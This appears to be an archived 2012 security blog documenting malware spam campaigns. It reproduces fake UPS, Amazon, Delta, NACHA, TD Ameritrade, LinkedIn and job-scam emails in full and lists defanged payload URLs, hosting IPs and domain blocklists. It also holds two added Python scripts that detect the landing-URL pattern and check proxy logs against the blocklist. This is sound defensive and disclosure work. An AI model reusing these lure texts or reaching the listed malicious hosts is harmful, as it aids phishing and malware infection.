Error message [404] 404 Not Found for m.facebook.com/home.php?sk=photodash
The emails appear to originate from a Yahoo! IP address, the sender's email address matches a registered Facebook account and in one case the URL in the subject links to a gallery from the same user. But I don't know who these people are, and the email address sent to is a rarely used one that has NEVER been used for Facebook.
In most cases the email is blank, in one case there is a photograph of a BlackBerry, apparently taken yesterday from a Samsung GT-C6625 (an oldish Windows Mobile device). The IP headers indicate that this is maybe coming through a mobile version of Yahoo! mail. An infected mobile phone perhaps?
It's all kind of odd, perhaps it is the precursor to something else?
Wednesday, 11 July 2012
UPS Spam / peace-computer.com
This fake UPS spam leads to malware on peace-computer.com:
Date: Wed, 11 Jul 2012 09:51:41 -0500
From: "Margret Bellamy" [USPS_Shipping_Services@usps.com]
Subject: Download your UPS invoices.
This is an automatically generated email Please do not reply to this email address.
Dear UPS Customer,
New invoice(invoices) are available for viewing in UPS billing center. Please note that your UPS invoices should be paid within 14 days to avoid any additional charges.
Please visit the UPS Billing Center to view and pay your invoice.
Find out more about UPS:
Visit ups.com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read our official journal
(c) 2012 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
The malicious payload is at [donotclick]peace-computer.com/main.php?page=22b33afad06e9ba5
on 62.109.26.35 (ISPsystem, Russia). The following domains and IPs are all connected to this attack:
Spam: Your Amazon.com order of "GoPro HD Helmet HERO Camcorder - Silver" has shipped!
Sent: 11 July 2012 15:12
Subject: Your Amazon.com order of "GoPro HD Helmet HERO Camcorder - Silver" has shipped!
Hello,
Shipping Confirmation
Order # 111-8744380-4899254
Your estimated delivery date is:
Friday, July 13 2012
Track your package Thank you for shopping with us. We thought you'd like to know that we shipped this portion of your order separately to give you quicker service. You won't be charged any extra shipping fees, and the remainder of your order will follow as soon as those items become available. If you need to return an item from this shipment or manage other orders, please visit Your Orders on Amazon.com.
Shipment Details
GoPro HD Helmet HERO Camcorder - Silver $149.95
Item Subtotal: $149.95
Shipping & Handling: $0.00
Total Before Tax: $149.95
Shipment Total: $149.95
Paid by Visa: $149.95
You have only been charged for the items sent in this shipment. Per our policy, you only pay for items when we ship them to you.
Returns are easy. Visit our .
If you need further assistance with your order, please visit Customer Service.
We hope to see you again soon!
Amazon.com
The message may appear to be sent from your own email address (this is why). The malicious payload is on [donotclick]savidae.net/main.php?page=f8475ba078c011af (report here) hosted on 178.238.130.222 (BurstNet UK, allocated to an individual in Ukraine). These other domains are on the same server, their status is not known.
UPDATE:
A similar campaign is underway with a payload on peace-computer.com (the same domain is used in this attack)
Another example:
Sent: den 11 juli 2012 16:19
Subject: Your Amazon.com order of "Withings WiFi Body Scale, Black" has shipped!
Hello,
Shipping Confirmation
Order # 353-3382862-1240149
Your estimated delivery date is:
Friday, July 13 2012
Track your package Thank you for shopping with us. We thought you'd like to know that we shipped this portion of your order separately to give you quicker service. You won't be charged any extra shipping fees, and the remainder of your order will follow as soon as those items become available. If you need to return an item from this shipment or manage other orders, please visit Your Orders on Amazon.com.
Shipment Details
Withings WiFi Body Scale, Black $139.95
Item Subtotal: $139.95
Shipping & Handling: $0.00
Total Before Tax: $139.95
Shipment Total: $139.95
Paid by Visa: $139.95
You have only been charged for the items sent in this shipment. Per our policy, you only pay for items when we ship them to you.
Returns are easy. Visit our .
If you need further assistance with your order, please visit Customer Service.
We hope to see you again soon!
Amazon.com
==========
Subject: Your Amazon.com order of "Boss JWVX3Y6 7-Inch DVD/MP3/CD Widescreen Bluetooth Receiver with USB and SD Card" has shipped!
Hello,
Shipping Confirmation
Order # 087-2687938-8778762
Your estimated delivery date is:
Friday, July 13 2012
Track your package Thank you for shopping with us. We thought you'd like to know that we shipped this portion of your order separately to give you quicker service. You won't be charged any extra shipping fees, and the remainder of your order will follow as soon as those items become available. If you need to return an item from this shipment or manage other orders, please visit Your Orders on Amazon.com.
Shipment Details
Boss JWVX3Y6 7-Inch DVD/MP3/CD Widescreen Bluetooth Receiver with USB and SD Card $149.95
Item Subtotal: $149.95
Shipping & Handling: $0.00
Total Before Tax: $149.95
Shipment Total: $149.95
Paid by Visa: $149.95
You have only been charged for the items sent in this shipment. Per our policy, you only pay for items when we ship them to you.
Returns are easy. Visit our .
If you need further assistance with your order, please visit Customer Service.
We hope to see you again soon!
Amazon.com
==========
Intuit.com spam / thaidescribed.com
This spam leads to malware on thaidescribed.com:
Date: Tue, 10 Jul 2012 13:49:59 -0300
From: "LinkedIn Communication" [USPS_Shipping_Services@usps.com]
Subject: New Payment through the Intuit network.
Incoming payment received: You received $840.00 from Parks LLC for invoice 53389
You can access the payment details here.
Funds will be transferred in your bank account.
You now have the opportunity to get paid by Credit Card on your invoices. To learn more please sign in to your IPN account and click on the 'Profile' tab on the left.
The malicious payload is on [donotclick]thaidescribed.com/main.php?page=8cb1f95c85bce71b (report here) hosted on 164.15.250.148 (Universite Libre de Bruxelles, Belgium). The malicious IPs and domains associated with this attack can also be found here, but you should probably block the following:
UPS Spam / proamd-inc.com
The malicious payload is at [donotclick]proamd-inc.com/main.php?page=8cb1f95c85bce71b (report here) hosted on 164.15.250.148 (Universite Libre de Bruxelles, Belgium).
Date: Tue, 10 Jul 2012 20:34:41 +0200
From: "Vernon Wade" [USPS_Shipping_Services@usps.com]
Subject: Your UPS invoices are ready for download.
This is an automatically generated email Please do not reply to this email address.
Dear UPS Customer,
New invoice(invoices) are available for download in UPS billing center. Do not forget that your UPS invoices should be paid within 28 days so as not to incur any additional charges.
Please surf to the UPS Billing Center to view and pay your invoice.
Find out more about UPS:
Visit ups.com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read our official blog
(c) 2012 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
==========
Date: Tue, 10 Jul 2012 19:20:05 +0330
From: "Don Reyes" [USPS_Shipping_Services@usps.com]
Subject: Please download and pay your UPS delivery charges.
This is an automatically generated email Please do not reply to this email address.
Dear UPS Customer,
New invoice(invoices) are available for viewing in UPS billing center. Do not forget that your UPS invoices should be paid within 28 days to avoid any additional charges.
Please visit the UPS Billing Center to view and pay your invoice.
Find out more about UPS:
Visit ups.com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read our official blog
(c) 2012 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
==========
From: Miguel Segura [mailto:USPS_Shipping_Services@usps.com]
Sent: 10 July 2012 16:47
Subject: You have outstanding UPS invoices.
This is an automatically generated email Please do not reply to this email address.
Valued UPS Customer,
New invoice(invoices) are available for download in UPS billing center. Please note that your UPS invoices should be paid within 21 days so as not to incur any additional charges.
Please visit the UPS Billing Center to view and pay your invoice.
________________________________________
Find out more about UPS:
Visit ups.com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read Compass Online
________________________________________
(c) 2012 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
The following domains and IPs are also involved in this attack and should be blocked:
Friday, 6 July 2012
"Your Receipt and Itinerary" spam / ellomb.net
The malicious payload is on [donotclick]ellomb.net/main.php?page=d502255d1a941be3 (not resolving when I tried to analyse it) hosted on 83.69.226.143 (Awax Telecom, Russia). Incidentally, 83.69.226.0/24 all looks pretty bad and is worth blocking.
From: Johnny Mooney [mailto:kxijgvpu@asistencia.org]
Sent: 06 July 2012 13:56
Subject: Your Receipt and Itinerary
Thank you for choosing Delta. We encourage you to review this information before your trip. If you need to contact Delta or check on your flight information, go to delta.com, call 800-221-1212 or call the number on the back of your SkyMiles© card.
Now, managing your travel plans just got easier. You can exchange, reissue and refund electronic tickets at delta.com. Take control and make changes to your itineraries at delta.com/itineraries.
Speed through the airport. Check-in online for your flight.
Flight Information
DELTA CONFIRMATION #: C1N270
TICKET #: 31894208655700
Day  Date   Flight      Status  Bkng Class  City              Time   Meals/Other  Seat/Cabin
---  -----  ----------  ------  ----------  ----------------  -----  -----------  ----------
Sun  8 JUL  DELTA 116   OK      U           LV NYC-KENNEDY    515P   F            45A
                                            AR SAN FRANCISCO  916P                COACH
Mon  9 JUL  DELTA 1837  OK      K           LV SAN FRANCISCO  1230P  V            32A
                                            AR NYC-KENNEDY    702A#               COACH
Baggage and check-in requirements vary by airport and airline, so please check with the operating carrier on your ticket.
Please review Delta's check-in Requirements and baggage guidelines for details.
You must be checked in and at the gate at least 15 minutes before your scheduled departure time for travel inside the United States.
You must be checked in and at the gate at least 45 minutes before your scheduled departure time for international travel.
For tips on flying safely with laptops, cell phones, and other battery-powered devices, please visit http://SafeTravel.dot.gov.
Do you have comments about our service? Please email us to share them with us.
-----------------------------------------------------------------------------
Conditions of Carriage
Air transportation on Delta and the Delta Connection carriers is subject to Delta's conditions of carriage. They include terms governing, for example:
Limits on our liability for personal injury or death of passengers, and for loss, damage or delay of goods and baggage.
Claim restrictions, including time periods within which you must file a claim or bring an action against us
Our right to change terms of the contract
Check-in requirements and other rules establishing when we may refuse carriage
Our rights and limits of our liability for delay or failure to perform service, including schedule changes, substitution of alternative air carriers or aircraft, and rerouting
Our policy on overbooking flights, and your rights if we deny you boarding due to an oversold flight
These terms are incorporated by reference into our contract with you. You may view these conditions of carriage on delta.com, or by requesting a copy from Delta.
Wednesday, 4 July 2012
Malware sites to block 4/7/12
These malicious domains and IPs are being used in the current "runforestrun" malware attacks. The domains are registered on a daily basis, so blocking the IPs might be more effective in this case.
Firefox OS: will it be safe?
Firefox OS is the new name for the "boot to gecko" project by the Mozilla foundation. It's a fully-featured OS built on a Linux core, and this is what Mozilla have to say about it:
The Firefox OS for mobile devices is built on Mozilla’s “Boot to Gecko project” which unlocks many of the current limitations of web development on mobile, allowing HTML5 applications to access the underlying capabilities of a phone, previously only Unix and Linux based mobile OSes available to native applications. Telefónica’s Digital unit joined forces with Mozilla earlier this year to take this work and showcase a new phone architecture where every phone feature (calling, messaging, games, etc.) is an HTML5 application.
Wait.. what? Basically, the browser can interact directly with the operating system.. and this is being done at a time when vendors are trying to keep the browser as separated as possible from the OS to mitigate against exploits.
This led me to pose the question in another publication: Firefox OS: will it be safe? Well, if you know Betteridge's Law of Headlines then the answer is probably "no".
We have been down this path before. ActiveX promised to allow the browser (in this case Internet Explorer) access to the system to allow it to do clever things. Yes, software authors could get their applications signed to demonstrate that they were trustworthy, but it was still a security nightmare. And despite the apparent death of ActiveX (when was the last time you installed an ActiveX component that wasn't Adobe Flash?) it still features prominently when it comes to patching.
And then there's Java. Java was meant to be safe because it was sandboxed from the rest of the machine it was running on. Fast forward to today.. and what is one of the most common vectors for malware infection? Yes, it's Java. Fundamentally the Java security model is broken, as the endless series of patches we see testifies to.
From a security perspective, keeping the browser just as a browser and limiting the interaction it has with the OS is the best approach. But Firefox OS wants to turn that on its head. And while Mozilla will no doubt put in processes to try to ensure that it will be safe, the examples of Java and ActiveX show how difficult it can be to nail it down.
Why does it matter? There's a lot of hype about mobile malware at the moment, but in my experience it is still an almost insignificant threat. That will change though, as more and more smartphones and tablets are being used for financially sensitive transactions, and fundamentally a smartphone is just a small computer and it can be added to a botnet for evil purposes.
One last consideration is this - getting updates. As (mostly) Android users will know, OS updates tend to dry up shortly after launch, leaving the underlying system vulnerable.. although Apple owners tend to get updates for a much longer time. Keeping on top of security threats will require Mozilla, the manufacturers and networks to co-operate closely to keep security updates rolling out. The Firefox OS model closely matches Android rather than Apple.. so Mozilla and its partners have their work cut out here too.
If you're interested, this article I wrote is a slightly different take on the subject.
Tuesday, 3 July 2012
TD Ameritrade spam / princess-sales.net
Date: Tue, 3 Jul 2012 21:38:09 +0530
From: "Micah Bright" [client@notifications.tdameritrade.com]
Subject: sbj
TD Ameritrade
Your account ending in XXX7 Log on
Your statement is now available online
Dear Valued Client,
Your statement for your TD Ameritrade account ending in XXX7 is now available online.
Access your statements
To view your statement (along with previous statements), please Log On to your account and choose "History & Statements" (under Accounts). Then click the "Statements" tab, select the appropriate month(s) under the "View statements" drop-down menu, then click the "View" button.
We're here to help
If you have any questions, please log on to your account and click "Message Center" (under Home) to write us. A representative will respond through your Message Center inbox. You can also call Client Services at 800-669-3900. We're available 24 hours a day, seven days a week.
Sincerely,
Tom Bradley
President, Retail Distribution
TD Ameritrade
The malicious payload is at [donotclick]princess-sales.net/main.php?page=7e45713861176c6b (report here) hosted on 203.237.211.223 in Korea.
Fake jobs: careerin-finance.com
This email is trying to recruit people for money laundering ("money mule") operations and other similar illegal activities:
From: [victim]
Date: 2 July 2012 20:48:51 GMT+01:00
To: [victim]
Subject: Recruitment in the large company
We have an excellent opportunity for an apprentice applicant to join a rapidly expanding company.
An at home Key Account Manager Position (Ref: 58020-095/1HR) is a great opportunity for stay at home parents or anyone who wants to work in the comfort of their own home.
This is a genuine offer and not to be confused with scams!
The successful candidate must have the ability to handle calls efficiently whilst maintaining the highest levels of customer service and being courteous.
Applicants must have an excellent telephone manner, have a friendly approach, excellent communication skills and be computer literate.
You must have the ability to type and talk at the same time to customers,
as you will be taking customer details over the phone and inputting data onto company database.
Requirements: computer with Internet access, valid email address, good typing skills.
If you fit the above description and meet the requirements, please apply to this ad stating your location.
You will be processing orders from your computer. How much you earn is up to you.
The average is in the region of US$600- US$750.00 per week, depending on whether you work full or part time.
If you would like more information, please contact us stating where you are located and our job reference number - 58020-095/1HR.
Please only SERIOUS applicants.
Our contacts: Olin@careerin-finance.com
Thank You!
The email may appear to come from the recipient (see "why am I sending myself spam?"). The domain careerin-finance.com was registered on 2nd July 2012 and solicits replies via a server at 37.247.48.176 (Prometeus, Italy).
Registrant details for the domain are no doubt fake:
Helen R. Espinoza
Helen Espinoza info@careerin-finance.com
413-845-0684 fax: 413-845-0331
3093 Trouser Leg Road
Springfield MA 01103
us
The domain is registered through scam-friendly Chinese registrar BIZCN.COM, Inc.
Nameservers are:
ns1.readycarts.com (37.247.48.176)
ns2.readycarts.com (12.199.102.98)
12.199.102.98 is registered to Barnes and Noble in the US. Is there a compromised server here? It's hard to be certain.
The following IPs and domains all seem to be connected:
Monday, 2 July 2012
American Airlines spam / ghanarpower.net
Date: Mon, 2 Jul 2012 16:54:15 +0200
From: "Cornelius Meyers" <notify@aa.globalnotifications.com>
Subject: Online American Airlines receipt.
Record Locator: MWNMLP
Date of Issue: 2JULY12
Thank you for choosing American Airlines / American Eagle, a member of the oneworld® Alliance.
This receipt is for the purchase of your Preferred Seat(s) which are detailed on your itinerary and receipt confirmation.
If you have any questions regarding your reservations, please call 1-800-433-7300 or visit www.aa.com.
Record Locator: MWNMLP
PASSENGER
CHADBOURN HAWLEY
DOCUMENT NUMBER / DATE
0010634774011/2JULY12
DESCRIPTION
PREFERRED SEATS
AMOUNT
17.67 USD
TAX
1.33
TOTAL
19.00 USD
Payment Type: Visa XXXXXXXXXXXX1392 Total: $19.00
================
Date: Mon, 2 Jul 2012 17:59:25 +0430
From: "Spencer Hurley" <notify@aa.globalnotifications.com>
Subject: Preferred seat purchase receipt.
Record Locator: XTSPJI
Date of Issue: 2JULY12
Thank you for choosing American Airlines / American Eagle, a member of the oneworld® Alliance.
This receipt is for the purchase of your Preferred Seat(s) which are detailed on your itinerary and receipt confirmation.
If you have any questions regarding your reservations, please call 1-800-433-7300 or visit www.aa.com.
Record Locator: XTSPJI
PASSENGER
CHADBOURN HAWLEY
DOCUMENT NUMBER / DATE
0010634774011/2JULY12
DESCRIPTION
PREFERRED SEATS
AMOUNT
17.67 USD
TAX
1.33
TOTAL
19.00 USD
Payment Type: Visa XXXXXXXXXXXX1293 Total: $19.00
The malicious payload is the same as used in this attack - blocking it and the related IPs and domains is probably wise.
TD Ameritrade Spam / ghanarpower.net
________________________________________
Your account ending in XXX7 Log on
________________________________________
Your statement is now available online
Dear Valued Client,
Your statement for your TD Ameritrade account ending in XXX7 is now available online.
Access your statements
To view your statement (along with previous statements), please Log On to your account and choose "History & Statements" (under Accounts). Then click the "Statements" tab, select the appropriate month(s) under the "View statements" drop-down menu, then click the "View" button.
We're here to help
If you have any questions, please log on to your account and click "Message Center" (under Home) to write us. A representative will respond through your Message Center inbox. You can also call Client Services at 800-669-3900. We're available 24 hours a day, seven days a week.
Sincerely,
Tom Bradley
President, Retail Distribution
TD Ameritrade
The malware can be found on [donotclick]ghanarpower.net/main.php?page=8c6c59becaa0da07 (report here) hosted on 188.165.1.192 (OVH, Ireland).
The following IPs and domains are connected to this attack and should also be blocked:
Thursday, 28 June 2012
Pinterest Spam / medicarewichi.com
Spammers will try anything.. this email pretends to be from Pinterest but it actually appears to lead to a fake pharma site at medicarewichi.com.
The spamvertised site is hosted on 91.238.180.92 which looks like a cesspit of toxic sites and is probably best blocked.
From: Pinterest [mailto:pinbot@pinterest.com]
Sent: 28 June 2012 14:41
Subject: New pins added
Hi!
With millions of new pins added every week, we connecting people all over the world based on shared tastes and interests. Explore pins
©2012 Pinterest, Inc. | All Rights Reserved.
Privacy Policy | Terms and Conditions
Malware sites to block 28/6/12
These malicious sites and IPs are connected with this spam run. I recommend blocking them.
31.17.189.212
41.66.137.155
41.168.5.140
50.57.43.49
50.57.88.200
62.76.45.241
62.76.188.120
62.76.189.62
62.76.191.172
62.213.64.161
64.120.134.7
66.90.76.62
83.143.134.23
83.170.91.152
85.17.72.34
85.214.204.32
87.204.199.100
91.210.189.68
91.221.70.19
94.75.231.156
95.142.167.193
95.168.185.214
95.168.185.215
95.168.185.216
95.168.185.217
95.168.185.218
95.211.18.79
110.234.150.163
110.234.176.99
128.134.57.112
173.203.96.79
178.33.105.222
178.63.208.37
178.63.249.35
178.63.249.45
184.106.189.124
184.106.200.41
188.72.199.247
188.72.220.158
188.212.156.170
190.81.107.70
194.109.21.8
195.14.104.76
200.169.13.84
208.158.5.195
209.114.47.158
211.44.250.173
219.94.194.242
caoodntkioaojdf.ru
clkjshdflhhshdf.ru
ckjsfhlasla.ru
ckjhasbybnhdjf.ru
cruikdfoknaofa.ru
debiudlasduisioa.ru
dkjhasjllasllalaa.ru
dhjikjsdhfkksjud.ru
dinamitbtzusons.ru
dkijhsdkjfhsdf.ru
dnvfodooshdkfhha.ru
doorpsjjaklskfjak.ru
dpasssjiufjkaksss.ru
dppriakjsdjfhss.ru
dsakhfgkallsjfd.ru
forumenginesspb.ru
hamlovladivostok.ru
harmoniavslove.ru
insomniacporeed.ru
kroshkidlahlebans.ru
monashkanasene.ru
opimmerialtv.ru
pekarniamsk.ru
piloramamoskow.ru
porscheforumspb.ru
rushsjhdhfjsldif.su
seledkindoms.ru
semelyontour.ru
spbfotomontag.ru
somaniksuper.ru
spiritzandmore.com
sshgjksdfhhsd.ru
superproomgh.ru
sushfpappsbf.ru
tarantsikvasiliy.ru
zolindarkksokns.ru
Labels:
.SU,
Evil Network,
Malware,
Viruses
NACHA Spam / porscheforumspb.ru
This fake NACHA spam leads to malware on porscheforumspb.ru:
The malicious payload is on [donotclick]porscheforumspb.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here), hosted on the following IPs:
110.234.176.99 (Tulip Telecom, India)
128.134.57.112 (Seoul Kwangun University, Korea)
190.81.107.70 (Telmex, Peru)
Date: Wed, 27 Jun 2012 06:18:09 -0430
From: "Electronic Payments Association" [donotreply@nacha.org]
Subject: Fwd: ACH Transfer rejected
The ACH transfer, initiated from your bank account, was canceled.
Canceled transfer:
Bath Nr.: FE-45452995330US
Transaction Report: View
ADELINE Jewell
Automated Clearing House, NACHA
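The "Transaction Report: View" link in this mail is what carries the recipient to the landing URL quoted above. As an added example (not code from the original post), the script below generalises that one URL into a signature, host:8080/forum/showthread.php?page=<16 hex characters>, plus the looser "any .ru/.su host on port 8080" heuristic that the RU:8080 label hints at, and runs both over the links extracted from a mail body. The HTML body is constructed to resemble the spam; the second link and its host path are invented for illustration.

```python
import re
from html.parser import HTMLParser

# Signature generalised from the single landing URL quoted in the post:
# <host>:8080/forum/showthread.php?page=<16 hex chars>. Host and hex token
# are variable; the port, path and token length are the fixed parts.
LANDING_RE = re.compile(
    r"^https?://(?P<host>[^/:]+):8080/forum/showthread\.php"
    r"\?page=(?P<page>[0-9a-f]{16})$",
    re.IGNORECASE,
)

# Looser heuristic after the blog's "RU:8080" label: a .ru or .su host
# serving anything on port 8080. Expect more false positives from this one.
RU_8080_RE = re.compile(r"^https?://[^/:]+\.(?:ru|su):8080/", re.IGNORECASE)


class LinkExtractor(HTMLParser):
    """Collect href targets from an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.links.append(value.strip())


def classify_url(url):
    """Return 'landing' for the exact page signature, 'ru8080' for the
    looser heuristic, or None if neither rule fires."""
    if LANDING_RE.match(url):
        return "landing"
    if RU_8080_RE.match(url):
        return "ru8080"
    return None


def suspicious_links(html_body):
    """Return [(url, verdict)] for every link in the body that trips a rule."""
    parser = LinkExtractor()
    parser.feed(html_body)
    return [(u, classify_url(u)) for u in parser.links if classify_url(u)]


# Constructed HTML approximating the spam above (sample data, not the real
# message). The second 8080 link is invented to exercise the looser rule.
SAMPLE_MAIL = """
<p>The ACH transfer, initiated from your bank account, was canceled.</p>
<p>Transaction Report:
<a href="http://porscheforumspb.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c">View</a></p>
<p><a href="http://www.nacha.org/">Automated Clearing House, NACHA</a></p>
<p><a href="http://rushsjhdhfjsldif.su:8080/other/index.php">unsubscribe</a></p>
"""

if __name__ == "__main__":
    for url, verdict in suspicious_links(SAMPLE_MAIL):
        print(f"{verdict:8} {url}")
```

The exact signature is the one to alert on; the port-8080 heuristic is better used to pull candidate links out for a second look, since legitimate sites do occasionally run on that port.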
Labels:
NACHA,
Printer Spam,
RU:8080,
Spam,
Viruses
LinkedIn spam / 74.63.252.106
This fake LinkedIn spam leads to malware on 74.63.252.106:
The malicious payload is at [donotclick]74.63.252.106/getfile.php?u=71fd37ed (report here) which is part of a small netblock of 74.63.252.96/27 rented out by Limestone Networks in the US. Some attempt has been made to prevent analysis by generating a fake 403 page if you try to analyse it directly.
Date: Thu, 28 Jun 2012 00:52:04 +0200
From: "2012, LinkedIn Corporation" [sdexheimer@itrs.com.br]
To: [y009-xc6.ftdsf@catchamail.com]
Subject: Relationship LinkedIn Mail
REMINDERS
Invitation reminders:
• From Kevin Sellers (VP Analytic Services at Glencore)
PENDING MESSAGES
• There are a total of 9 messages awaiting your response. Visit your InBox now.
Don't want to receive email notifications? Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission. © 2012, LinkedIn Corporation.
Labels:
LinkedIn
Wednesday, 27 June 2012
Thursday, 21 June 2012
Malware sites to block 21/6/12
These sites and IPs are all connected to recent malicious spam runs. Blocking them either by IP address or domain name would probably be prudent.
46.162.27.165
64.79.106.188
91.227.220.114
109.164.221.176
109.169.86.139
173.234.9.84
187.5.116.251
192.84.186.206
199.101.99.155
abc-spain.net
abilenepaint.net
asiazmile.net
autobouracky.net
autosnort.net
chicleart.net
computerpills.net
cool-mail.net
energirans.net
grapecomputers.net
gtautond.com
hiring-decisions.com
hseclub.net
installandwork.com
itscholarshipz.net
jobforfamily.com
keurigminis.net
mynourigen.net
leadgems.net
perfectbusinesschance.net
savecoralz.net
synergyledlighting.net
systemtestnow.com
workandlivenow.com
workathomeforyou.net
yourfreeworkathome.net
yourlifechance.net
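Both this list and the 28/6/12 one above mix bare IPs and domain names, which is fine for reading but awkward to feed into a proxy, DNS resolver or log search as-is. As an added example (not code from the original post), the script below parses such a list into networks and domains, checks hosts against it (matching subdomains of listed domains and IPs inside any listed CIDR, so a /22 can sit alongside single addresses), scans constructed Squid-format proxy log lines for hits on either the URL host or the upstream server IP, and emits BIND RPZ records. The blocklist excerpt is a handful of entries copied from the lists on this page; the log lines, client addresses and the extra hostnames in them are constructed sample data.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed excerpt of the lists on this page (a few IPs and domains the
# posts recommend blocking). Any full list can be pasted in verbatim; blank
# lines and '#' comments are ignored, and CIDRs are accepted alongside IPs.
BLOCKLIST_TEXT = """
31.17.189.212
110.234.176.99
128.134.57.112
190.81.107.70
74.63.252.106
porscheforumspb.ru
rushsjhdhfjsldif.su
workathomeforyou.net
# 91.238.180.92 hosts the spamvertised Pinterest pharma site
91.238.180.92
"""


def parse_blocklist(text):
    """Split a mixed list of IPs/CIDRs and domains into two sets.
    Returns (networks, domains); single IPs become /32 networks so that
    ranges and single addresses can be tested the same way."""
    networks, domains = set(), set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip().lower()
        if not line:
            continue
        try:
            networks.add(ipaddress.ip_network(line, strict=False))
        except ValueError:
            domains.add(line.rstrip("."))
    return networks, domains


def host_is_blocked(host, networks, domains):
    """True if host is a listed IP (or inside a listed CIDR), or is a listed
    domain or a subdomain of one, so www.porscheforumspb.ru also matches."""
    host = host.strip().lower().rstrip(".")
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        labels = host.split(".")
        return any(".".join(labels[i:]) in domains for i in range(len(labels)))
    return any(addr in net for net in networks)


# Constructed Squid native-format access log lines (sample data, not from the
# posts): time elapsed client status/code bytes method URL ident peer/host type.
SAMPLE_LOG = """\
1340874000.123    412 10.0.0.12 TCP_MISS/200 1523 GET http://porscheforumspb.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c - DIRECT/110.234.176.99 text/html
1340874001.456    310 10.0.0.15 TCP_MISS/200 9812 GET http://www.example.org/ - DIRECT/93.184.216.34 text/html
1340874002.789    205 10.0.0.12 TCP_MISS/200 3310 GET http://74.63.252.106/getfile.php?u=71fd37ed - DIRECT/74.63.252.106 application/octet-stream
1340874003.012    180 10.0.0.20 TCP_MISS/403 512 GET http://cdn.workathomeforyou.net/x.js - DIRECT/91.238.180.92 text/html
"""


def scan_squid_log(lines, networks, domains):
    """Return (client, url) for each request whose URL host or upstream peer
    IP is on the blocklist. Both are checked because a listed domain may have
    moved to an unlisted IP, or a listed IP may serve an unlisted name."""
    hits = []
    for line in lines.splitlines():
        fields = line.split()
        if len(fields) < 9:
            continue
        client, url, peer = fields[2], fields[6], fields[8]
        url_host = urlsplit(url).hostname or ""
        peer_ip = peer.split("/", 1)[1] if "/" in peer else ""
        if host_is_blocked(url_host, networks, domains) or (
            peer_ip and host_is_blocked(peer_ip, networks, domains)
        ):
            hits.append((client, url))
    return hits


def to_rpz_records(domains):
    """Emit BIND response-policy-zone records that NXDOMAIN each listed
    domain and every subdomain of it."""
    ordered = sorted(domains)
    return [f"{d} CNAME ." for d in ordered] + [f"*.{d} CNAME ." for d in ordered]


if __name__ == "__main__":
    nets, doms = parse_blocklist(BLOCKLIST_TEXT)
    for client, url in scan_squid_log(SAMPLE_LOG, nets, doms):
        print(f"{client} -> {url}")
    print("\n".join(to_rpz_records(doms)))
```

Checking the peer IP as well as the URL host is what catches the fourth sample line even if cdn.workathomeforyou.net were not a subdomain of a listed name: it was served from 91.238.180.92, which the Pinterest post above flags. The domain match is suffix-based on whole labels, so notporscheforumspb.ru does not match.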
Labels:
Evil Network